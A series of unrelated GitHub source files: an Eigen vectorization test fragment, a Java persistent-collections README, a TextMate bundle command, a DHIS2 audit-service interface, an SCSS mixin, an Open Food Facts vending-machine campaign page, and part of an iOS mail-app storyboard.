CALL_SUBTEST( vectorization_logic<double>::run() );
CALL_SUBTEST( vectorization_logic<std::complex<float> >::run() );
CALL_SUBTEST( vectorization_logic<std::complex<double> >::run() );
CALL_SUBTEST( vectorization_logic_half<int>::run() );
CALL_SUBTEST( vectorization_logic_half<float>::run() );
CALL_SUBTEST( vectorization_logic_half<double>::run() );
CALL_SUBTEST( vectorization_logic_half<std::complex<float> >::run() );
CALL_SUBTEST( vectorization_logic_half<std::complex<double> >::run() );
if(internal::packet_traits<float>::Vectorizable)
{
VERIFY(test_assign(Matrix<float,3,3>(),Matrix<float,3,3>()+Matrix<float,3,3>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : LinearTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<float,5,2>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : DefaultTraversal,CompleteUnrolling));
}
if(internal::packet_traits<double>::Vectorizable)
{
VERIFY(test_assign(Matrix<double,3,3>(),Matrix<double,3,3>()+Matrix<double,3,3>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : LinearTraversal,CompleteUnrolling));
VERIFY(test_redux(Matrix<double,7,3>(),
EIGEN_UNALIGNED_VECTORIZE ? LinearVectorizedTraversal : DefaultTraversal,CompleteUnrolling));
}
#endif // EIGEN_VECTORIZE
}
| {
"pile_set_name": "Github"
} |
Introduction to Persistent Collections for Java
There are several ways to use the library:
1. Use instances of built-in persistent classes in your applications
2. Extend built-in persistent classes with new methods
3. Declare new persistent classes, or extend built-in classes, with methods and persistent fields
Examples of these 3 usages are shown below.
1. Instances of built-in persistent classes can be contained in other objects. Persistent objects act like normal Java
objects except their lifetime can extend beyond the life of a VM instance and (if real persistent memory installed)
machine restarts.
PersistentIntArray a = new PersistentIntArray(1024); // Ints are allocated on persistent heap, initialized to 0.
a.set(0, 123); // 4-byte int value written directly to persistent heap.
a = null; // Array is unreachable. Object including persistent state
// will be garbage collected.
PersistentArray<PersistentString> strings = new PersistentArray<>(100); // 100 object references, initialized to null,
// are allocated on persistent heap.
ObjectDirectory.put("data", strings); // ObjectDirectory is an indefinitely reachable built-in map.
// No serialization is done, only object references written.
strings.set(0, new PersistentString("hello")); // Utility methods exist for creating persistent strings
strings.set(1, persistent("world")); // and (boxed) scalars.
// restart
@SuppressWarnings("unchecked")
PersistentArray<PersistentString> strings1 = ObjectDirectory.get("data", PersistentArray.class);
// no deserialization done above, retrieves object reference
assert(strings1.get(1).equals(persistent("world")));
A useful idiom for retrieving references after a restart is:
class Application {
static PersistentIntArray data;
static {
data = ObjectDirectory.get("Application_data", PersistentIntArray.class);
if (data == null) ObjectDirectory.put("Application_data", data = new PersistentIntArray(1024));
}
// ...
}
2. Non-final built-in persistent classes can be extended with new methods.
class Employee extends PersistentTuple2<PersistentLong, PersistentString> {
public Employee(PersistentLong id, PersistentString name) {
_1(id);
_2(name);
}
private PersistentLong getId() {return _1();}
private PersistentString getName() {return _2();}
}
3. There is a general API for declaring new persistent classes as well extending classes with both methods and persistent
fields. Almost any kind of persistent class can be defined using this declaration API implementation scheme; for
example it was is used to implement all the built-in persistent classes.
Since persistent fields have to be read and written to a different heap and this has to be done in a fail-safe way,
persistent fields are declared with meta-fields objects -- constants which are used with PersistentObject base class
accessor methods. This meta-programming aspect is a consequence of this project code being implemented as a library.
The first example below shows the differences between regular class declaration and persistent class declaration
Given a non-persistent class with long and String fields such as:
final class Employee {
private final long id;
private String name;
public Employee(int id, String name) {
this.id = id;
setName(name);
}
public void setName(String name) {
this.name = name;
}
public String getName() {
return name;
}
public long getId() {
return id;
}
// rest of code
}
The following implements an equivalent persistent class:
final class Employee extends PersistentObject {
private static final LongField ID = new LongField();
private static final StringField NAME = new StringField();
private static final ObjectType<Employee> TYPE = ObjectType.withFields(Employee.class, ID, NAME);
public Employee(int id, PersistentString name) {
super(TYPE); // base class needs persistent fields specification
setLongField(ID, id); // setter in PersistentObject base class
setName(name); // setObjectName(NAME, name) works too
}
private Employee(ObjectPointer<Employee> p) { // Required boilerplate "reconstructor" passes opaque pointer
super(p); // to base class. This is a non-allocating reconstruction path
} // used e.g. after restart
public void setName(PersistentString name) { // limiting the use of Field objects to constructors and
setObjectField(NAME, name); // and accessors hides meta-programming aspect and can
} // make maintenance easier.
public PersistentString getName() {
return getObjectField(NAME);
}
public long getId() {
return getLongField(ID);
}
// rest of code
}
The rest of the code persistent class code must use accessor methods since there are no real persistent fields
Other than these things, the code need not be much different from the non-persistent code. This makes
"porting" code to create persistent versions possible.
Other things to note about persistent class code:
- Real fields declared in a persistent class will not persist across JVM instances. When the persistent object
is retrieved after a restart (e.g. from the ObjectDirectory or from another persistent object), the
non-persistent fields will be reinitialized to their default Java values. This can be augmented by putting
non-persistent field initialization code in the reconstructor shown above.
- If application logic requires that writes to multiple fields happen in a fail-safe atomic way, these writes
should be wrapped in a transaction. Methods on built-in classes execute in this fail-safe atomic way so such
transactions are not required for single method calls. Examples of transactions are shown later in this
document.
Such developer-defined classes, as well as non-final built-in classes can be extended.
For example, given a non-final version of the Employee class from above:
class Employee extends PersistentObject {
private static final LongField ID = new LongField();
private static final StringField NAME = new StringField();
public static final ObjectType<Employee> TYPE = ObjectType.withFields(Employee.class, ID, NAME); //TYPE is now public
public Employee(int id, PersistentString name) {
this(TYPE, id, name);
}
// add a subclassing constructor that forwards type argument to base class
protected Employee(ObjectType<? extends Employee> type, int id, PersistentString name) {
super(type);
setLongField(ID, id);
setName(name);
}
private Employee(ObjectPointer<? extends Employee> p) { // type bounds allow subtypes
super(p);
}
public void setName(PersistentString name) {
setObjectField(NAME, name);
}
// rest of code
}
An (also non-final) Engineer class that extends Employee is:
class Engineer extends Employee {
private static final StringField PROJECT = new StringField(); // new field
public static final ObjectType<Engineer> TYPE = Employee.TYPE.extendWith(Engineer.class, PROJECT); // extend type
public Engineer(int id, PersistentString name, PersistentString project) {
this(TYPE, id, name, project);
}
protected Engineer(ObjectType<? extends Engineer> type, int id, PersistentString name, PersistentString project) {
super(type, id, name);
setProject(project);
}
protected Engineer(ObjectPointer<? extends Engineer> p) {
super(p);
}
public PersistentString getProject() {
return getObjectField(PROJECT);
}
public void setProject(PersistentString project) {
setObjectField(PROJECT, project);
}
// rest of code
}
Methods in built-in persistent classes, if they modify persistent state, execute in a fail-safe way. The method
will make all changes associated with the method or will make no changes. Developer-authored classes can achieve
this same fail-safety by wrapping multiple writes to persistent state in a Transaction. For example, if adding
a Movie to a collection requires updating another collection
PersistentArrayList<PersistentString> movies = new PersistentArrayList<>();
PersistentArrayList<PersistentString> movieIndex = new PersistentArrayList<>();
public void addMovie(PersistentString movie) {
Transaction.run(() -> {
movies.add(movie);
movieIndex.add(movie);
});
}
If something was to interrupt execution part way through the transaction body, upon restart, the persistent state
will appear as if the addMovie method was never called. On the other hand, once execution returns from the addMovie
method, a developer can be sure both adds performed inside the method are complete and the data is persistent.
To summarize, the "recipe" for declaring and implementing persistent versions of existing or imagined regular classes:
1. Inherit directly or indirectly from PersistentObject
2. Change field declarations to static Field constants
3. Aggregate these Field constants in a declared static ObjectType constant
4. Call the base class constructor passing the ObjectType
5. Write accessor methods that call base class accessors using Field objects
6. Write "reconstructor" boilerplate, forwarding ObjectPointer argument to super()
An annotation processor is being developed to give static checking of these elements for classes declared with
the @PersistentClass annotation. Tolerating this recipe allows the creation of persistent classes whose instances
act like regular, albeit long-lived, Java objects.
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>beforeRunningCommand</key>
<string>nop</string>
<key>command</key>
<string>#!/usr/bin/env sh
cat <<'RUBYEOF' > /tmp/ruby-amp-$$.rb
require "#{ENV["TM_BUNDLE_SUPPORT"]}/lib/ruby_amp.rb"
require "#{ENV["TM_BUNDLE_SUPPORT"]}/lib/ruby_tm_helpers.rb"
RubyAMP::Config.create_config(:global)
tm_open(RubyAMP::Config::CONFIG_PATHS[:global])
RUBYEOF
${TM_RUBY:-ruby} /tmp/ruby-amp-$$.rb; exit_status=$?; rm /tmp/ruby-amp-$$.rb; exit $exit_status</string>
<key>input</key>
<string>selection</string>
<key>name</key>
<string>Edit RubyAMP Global Config</string>
<key>output</key>
<string>discard</string>
<key>uuid</key>
<string>8D27E812-E9BE-4E83-95AE-483D1761CA40</string>
</dict>
</plist>
| {
"pile_set_name": "Github"
} |
package org.hisp.dhis.trackedentityattributevalue;
/*
* Copyright (c) 2004-2020, University of Oslo
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice, this
* list of conditions and the following disclaimer.
*
* Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
* Neither the name of the HISP project nor the names of its contributors may
* be used to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
* WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
* ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
import org.hisp.dhis.common.AuditType;
import org.hisp.dhis.trackedentity.TrackedEntityAttribute;
import org.hisp.dhis.trackedentity.TrackedEntityInstance;
import java.util.List;
/**
* @author Morten Olav Hansen <[email protected]>
*/
public interface TrackedEntityAttributeValueAuditService
{
void addTrackedEntityAttributeValueAudit( TrackedEntityAttributeValueAudit trackedEntityAttributeValueAudit );
List<TrackedEntityAttributeValueAudit> getTrackedEntityAttributeValueAudits( List<TrackedEntityAttribute> trackedEntityAttributes,
List<TrackedEntityInstance> trackedEntityInstances, AuditType auditType );
List<TrackedEntityAttributeValueAudit> getTrackedEntityAttributeValueAudits( List<TrackedEntityAttribute> trackedEntityAttributes,
List<TrackedEntityInstance> trackedEntityInstances, AuditType auditType, int first, int max );
int countTrackedEntityAttributeValueAudits( List<TrackedEntityAttribute> trackedEntityAttributes,
List<TrackedEntityInstance> trackedEntityInstances, AuditType auditType );
void deleteTrackedEntityAttributeValueAudits( TrackedEntityInstance trackedEntityInstance );
}
| {
"pile_set_name": "Github"
} |
// Contextual backgrounds
@mixin bg-variant($parent, $color) {
#{$parent} {
background-color: $color !important;
}
a#{$parent} {
@include hover-focus {
background-color: darken($color, 10%) !important;
}
}
}
| {
"pile_set_name": "Github"
} |
<pre>
<h1>Grade Your Vending Machine !</h1>
<div class="row">
<div class="small-12 medium-6 large-8 columns">
<p>In 2016, <a href="https://world.openfoodfacts.org/discover">Open Food Facts</a> goes a step further in helping informing the consumer. Thanks to the system of <a href="https://fr.blog.openfoodfacts.org/news/decouvrez-la-note-nutritionnelle-5-couleurs-de-500-cereales-pour-petit-dejeuner-et-22-000-autres-produits-sur-open-food-facts">colour notes A/B/C/D/E</a> established by professeur Serge Hercberg, everybody can ascertain in a single glance the nutritional quality of a food product. The formula, which takes into account saturated fats, sugar, salt, fibers and the content of fruit, vegetables and nuts, is already available for 54 000 products in our open database. !</p>
<p id="description">The action « Grade Your Vending Machine ! » raises, on the one hand, the awareness of the consumers on the lack of product diversity in these machines. A vending machine offers more often than not bad quality products without a healthy alternative. On the other hand it is the moment to indicate the nutritional value of these products without havingg to buy them !</p>
<h2>How can you participate ?</h2>
<p>Come across a vending machine? Take a photo of the (well-lit) front, and share it on <a href="https://twitter.com/openfoodfacts">Twitter</a> with the hashtag <a href="https://twitter.com/search?f=tweets&q=%23TagYourVendingMachine&src=typd">#TagYourVendingMachine</a>.</p>
<p>We will send you back the photo of your vending machine with colored nutritional notes, which you can distribute in your company, university and why not post it on the vending machine itself.</p>
</div>
<div class="small-12 medium-6 large-4 columns">
<img id="og_image" src="/images/misc/notetondistrib.1024x1169.jpg" alt="Grade Your Vending Machine">
</div>
</div>
<h2>Vending Machines already graded</h2>
<!-- disable_equalizer -->
<ul class="small-block-grid-1 medium-block-grid-2 large-block-grid-3">
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">Vending Machine <a href="https://twitter.com/hashtag/Selecta?src=hash">#Selecta</a> on station <a href="https://twitter.com/SNCF">@SNCF</a> d'<a href="https://twitter.com/HeninBeaumont">@HeninBeaumont</a>. "Here the bad notes" <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/KYEB2JPpsl">pic.twitter.com/KYEB2JPpsl</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/712722065854480384">23 March 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">Few healthy choices : abstain? <a href="https://twitter.com/hashtag/Selecta?src=hash">#Selecta</a> Vending Machine at the <a href="https://twitter.com/SNCF">@SNCF</a> Chagny station. <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/lQsStG1G6C">pic.twitter.com/lQsStG1G6C</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/711188943748931584">19 March 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">« The Art of the Break » in a vending machine at <a href="https://twitter.com/hashtag/Eurexpo?src=hash">#Eurexpo</a> in Lyons… So as to « break » your balanced diet ? 😅 <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/Pp4HnZfq6T">pic.twitter.com/Pp4HnZfq6T</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/703291379343081473">26 February 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-lang="en">
<p lang="en" dir="ltr">First <a href="https://twitter.com/sodebo">@sodebo</a> vending machine tagged ! <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (cc <a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a> <a href="https://twitter.com/Paris_Dauphine">@Paris_Dauphine</a>) <a href="https://t.co/EH2pdolOMz">pic.twitter.com/EH2pdolOMz</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/700042342980521985">17 February 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" data-lang="en">
<p lang="en" dir="ltr"><a href="https://twitter.com/SNCF">@SNCF</a> <a href="https://twitter.com/Marne_la_Vallee">@Marne_la_Vallee</a> station. Not much choice… (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a> <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a>) <a href="https://t.co/QqaN8oXiYc">pic.twitter.com/QqaN8oXiYc</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/694958292293042176">3 February 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en"><p lang="en" dir="ltr">Vending machine in <a href="https://twitter.com/Univ_Savoie">@Univ_Savoie</a> (on the Jacob campus) : More choices = More E ? <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/qSQRLp4alZ">pic.twitter.com/qSQRLp4alZ</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/691915196080771072">26 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="fr">
<p lang="fr" dir="ltr">Vending machine <a href="https://twitter.com/CCOJPL">@CCOJPL</a> : « There is ample opportunity to innovate ! » (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> <a href="https://t.co/7f0CBzisgN">pic.twitter.com/7f0CBzisgN</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/689151635566665728">18 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">« Wrong notes at the Miribel Music Academy. » <a href="https://twitter.com/hashtag/TagYourVendingMachine?src=hash">#TagYourVendingMachine </a> (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/2w4m2guwHw">pic.twitter.com/2w4m2guwHw</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/688322701891649536">16 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">Mâcon Station : « Do not touch my vending machines: you're at risk of becoming very strong ». (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/kc9KoDxkrh">pic.twitter.com/kc9KoDxkrh</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/687647829209313280">14 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">In 2012, <a href="https://twitter.com/SNCF">@SNCF</a> launched the "Healthier commute" campaign. In 2016, a vending machine Gare de Lyon. (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/67vAGG8sps">pic.twitter.com/67vAGG8sps</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/685572687297687552">8 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">« Do you consider nutrition a fundamental science ? » You have 4 hours. At <a href="https://twitter.com/insadelyon">@insadelyon</a>… 😁 (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/qfe7cocVkL">pic.twitter.com/qfe7cocVkL</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/685471374022938624">8 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">Vending machine of <a href="https://twitter.com/UnivLyon1">@UnivLyon1</a> : Hungry ? Water + Chewing-gum 👌 Yummy 😅 (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/F34eN05tEq">pic.twitter.com/F34eN05tEq</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/685382028888518656">8 January 2016</a></blockquote>
</li>
<li>
<blockquote class="twitter-tweet" data-conversation="none" lang="en">
<p lang="en" dir="ltr">Vending Machine <a href="https://twitter.com/hashtag/Lyovel?src=hash">#Lyovel</a> at <a href="https://twitter.com/Univ_Artois">@Univ_Artois</a> : Eat healthy ? You might like compote 😁 (<a href="https://twitter.com/OpenFoodFactsFr">@OpenFoodFactsFr</a>) <a href="https://t.co/u7e9ZoyuDd">pic.twitter.com/u7e9ZoyuDd</a></p>— Tacite (@TaciteFood) <a href="https://twitter.com/TaciteFood/status/684741528544276480">6 January 2016</a></blockquote>
</li>
</ul>
<script async src="//platform.twitter.com/widgets.js" charset="utf-8"></script>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<document type="com.apple.InterfaceBuilder3.CocoaTouch.Storyboard.XIB" version="3.0" toolsVersion="12120" systemVersion="16E195" targetRuntime="iOS.CocoaTouch" propertyAccessControl="none" useAutolayout="YES" useTraitCollections="YES" colorMatched="YES" initialViewController="LX8-Wu-PZs">
<device id="retina5_5" orientation="portrait">
<adaptation id="fullscreen"/>
</device>
<dependencies>
<plugIn identifier="com.apple.InterfaceBuilder.IBCocoaTouchPlugin" version="12088"/>
<capability name="Constraints to layout margins" minToolsVersion="6.0"/>
<capability name="Segues with Peek and Pop" minToolsVersion="7.1"/>
<capability name="documents saved in the Xcode 8 format" minToolsVersion="8.0"/>
</dependencies>
<scenes>
<!--Inbox-->
<scene sceneID="G8x-01-wca">
<objects>
<collectionViewController id="cmw-A4-aNK" customClass="MailCollectioViewController" customModule="MailExample" customModuleProvider="target" sceneMemberID="viewController">
<collectionView key="view" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="scaleToFill" dataMode="prototypes" id="908-WI-Mtj">
<rect key="frame" x="0.0" y="0.0" width="414" height="736"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<color key="backgroundColor" white="1" alpha="1" colorSpace="calibratedWhite"/>
<collectionViewFlowLayout key="collectionViewLayout" minimumLineSpacing="10" minimumInteritemSpacing="10" id="vcT-nn-5Lc">
<size key="itemSize" width="386" height="141"/>
<size key="headerReferenceSize" width="0.0" height="0.0"/>
<size key="footerReferenceSize" width="0.0" height="0.0"/>
<inset key="sectionInset" minX="0.0" minY="0.0" maxX="0.0" maxY="0.0"/>
</collectionViewFlowLayout>
<cells>
<collectionViewCell opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" reuseIdentifier="MailCell" id="fLQ-Wv-7IX" customClass="MailCollectionCell" customModule="MailExample" customModuleProvider="target">
<rect key="frame" x="14" y="0.0" width="386" height="141"/>
<autoresizingMask key="autoresizingMask" flexibleMaxX="YES" flexibleMaxY="YES"/>
<view key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center">
<rect key="frame" x="0.0" y="0.0" width="386" height="141"/>
<autoresizingMask key="autoresizingMask"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" axis="vertical" alignment="top" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="1HJ-g8-owo">
<rect key="frame" x="5" y="9" width="376" height="80.333333333333329"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="6" translatesAutoresizingMaskIntoConstraints="NO" id="PS0-1N-UsZ">
<rect key="frame" x="0.0" y="0.0" width="370" height="20.333333333333336"/>
<subviews>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="252" verticalHuggingPriority="251" text="John Doe" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="mP8-DH-PmZ">
<rect key="frame" x="0.0" y="0.0" width="75.666666666666671" height="20.333333333333336"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleHeadline"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="12:16 AM" textAlignment="right" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="1f9-ii-Bpm">
<rect key="frame" x="81.666666666666657" y="1.3333333333333321" width="268.33333333333337" height="18.000000000000004"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
<imageView userInteractionEnabled="NO" contentMode="scaleToFill" horizontalHuggingPriority="251" verticalHuggingPriority="251" image="Disclosure" translatesAutoresizingMaskIntoConstraints="NO" id="hqu-np-szt">
<rect key="frame" x="356" y="3.3333333333333321" width="14" height="14.000000000000004"/>
<constraints>
<constraint firstAttribute="width" constant="14" id="Utg-5B-9hs"/>
<constraint firstAttribute="height" constant="14" id="bHQ-dV-xtu"/>
</constraints>
</imageView>
</subviews>
</stackView>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" text="Fwd: Jane's independent studies" textAlignment="natural" lineBreakMode="tailTruncation" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="Z64-RE-lES">
<rect key="frame" x="0.0" y="22.333333333333336" width="224.33333333333334" height="18"/>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<nil key="textColor"/>
<nil key="highlightedColor"/>
</label>
<label opaque="NO" userInteractionEnabled="NO" contentMode="left" horizontalHuggingPriority="251" verticalHuggingPriority="251" textAlignment="natural" lineBreakMode="tailTruncation" numberOfLines="2" baselineAdjustment="alignBaselines" adjustsFontSizeToFit="NO" translatesAutoresizingMaskIntoConstraints="NO" id="55J-2s-TCz">
<rect key="frame" x="0.0" y="42.333333333333329" width="0.0" height="37.999999999999986"/>
<string key="text">Sra. Mendez - Thank you so MUCH for this. We know you do not have to do this and we are so grateful to you. Please let us know if there's anything else we can do.</string>
<fontDescription key="fontDescription" style="UICTFontTextStyleSubhead"/>
<color key="textColor" red="0.40000000000000002" green="0.40000000000000002" blue="0.40000000000000002" alpha="1" colorSpace="calibratedRGB"/>
<nil key="highlightedColor"/>
</label>
</subviews>
<constraints>
<constraint firstItem="PS0-1N-UsZ" firstAttribute="width" secondItem="1HJ-g8-owo" secondAttribute="width" id="SlE-2p-q0h"/>
</constraints>
</stackView>
</subviews>
</view>
<constraints>
<constraint firstItem="1HJ-g8-owo" firstAttribute="top" secondItem="fLQ-Wv-7IX" secondAttribute="topMargin" constant="8" id="2lL-rO-DAu"/>
<constraint firstItem="1HJ-g8-owo" firstAttribute="leading" secondItem="fLQ-Wv-7IX" secondAttribute="leadingMargin" id="DGz-qr-x7U"/>
<constraint firstAttribute="bottomMargin" relation="greaterThanOrEqual" secondItem="1HJ-g8-owo" secondAttribute="bottom" constant="8" id="YoS-XG-3iv"/>
<constraint firstAttribute="trailingMargin" secondItem="1HJ-g8-owo" secondAttribute="trailing" id="j2K-l5-IEc"/>
</constraints>
<connections>
<outlet property="bodyLabel" destination="55J-2s-TCz" id="7h3-f1-1lY"/>
<outlet property="dateLabel" destination="1f9-ii-Bpm" id="s7e-5c-xlo"/>
<outlet property="fromLabel" destination="mP8-DH-PmZ" id="YOz-Wz-MQ9"/>
<outlet property="subjectLabel" destination="Z64-RE-lES" id="MfW-0O-Aae"/>
</connections>
</collectionViewCell>
</cells>
<connections>
<outlet property="dataSource" destination="cmw-A4-aNK" id="7yH-sI-5V9"/>
<outlet property="delegate" destination="cmw-A4-aNK" id="cAX-5G-GfZ"/>
</connections>
</collectionView>
<navigationItem key="navigationItem" title="Inbox" id="cNZ-i7-2vB"/>
</collectionViewController>
<placeholder placeholderIdentifier="IBFirstResponder" id="m70-AD-FEd" userLabel="First Responder" sceneMemberID="firstResponder"/>
</objects>
<point key="canvasLocation" x="1137" y="-370"/>
</scene>
<!--Inbox-->
<scene sceneID="HlW-7Y-kIf">
<objects>
<tableViewController id="6la-Rf-5vT" customClass="MailViewController" customModule="MailExample" customModuleProvider="target" sceneMemberID="viewController">
<tableView key="view" clipsSubviews="YES" contentMode="scaleToFill" alwaysBounceVertical="YES" dataMode="prototypes" style="plain" separatorStyle="default" rowHeight="141" sectionHeaderHeight="28" sectionFooterHeight="28" id="CnD-MW-SLC">
<rect key="frame" x="0.0" y="0.0" width="414" height="736"/>
<autoresizingMask key="autoresizingMask" widthSizable="YES" heightSizable="YES"/>
<color key="backgroundColor" white="1" alpha="1" colorSpace="calibratedWhite"/>
<prototypes>
<tableViewCell clipsSubviews="YES" contentMode="scaleToFill" preservesSuperviewLayoutMargins="YES" selectionStyle="default" indentationWidth="10" reuseIdentifier="MailCell" rowHeight="141" id="5Yy-lT-eDE" customClass="MailTableCell" customModule="MailExample" customModuleProvider="target">
<rect key="frame" x="0.0" y="28" width="414" height="141"/>
<autoresizingMask key="autoresizingMask"/>
<tableViewCellContentView key="contentView" opaque="NO" clipsSubviews="YES" multipleTouchEnabled="YES" contentMode="center" preservesSuperviewLayoutMargins="YES" tableViewCell="5Yy-lT-eDE" id="4sX-Fn-82y">
<rect key="frame" x="0.0" y="0.0" width="414" height="140.5"/>
<autoresizingMask key="autoresizingMask"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" axis="vertical" alignment="top" spacing="2" translatesAutoresizingMaskIntoConstraints="NO" id="QLZ-ve-Blz">
<rect key="frame" x="15" y="8" width="376" height="80.333333333333329"/>
<subviews>
<stackView opaque="NO" contentMode="scaleToFill" alignment="center" spacing="6" translatesAutoresizingMaskIntoConstraints="NO" id="mEo-oH-eCL">
<rect key="frame" x="0.0" y="0.0" width="376" height="20.333333333333332"/>
<subviews>
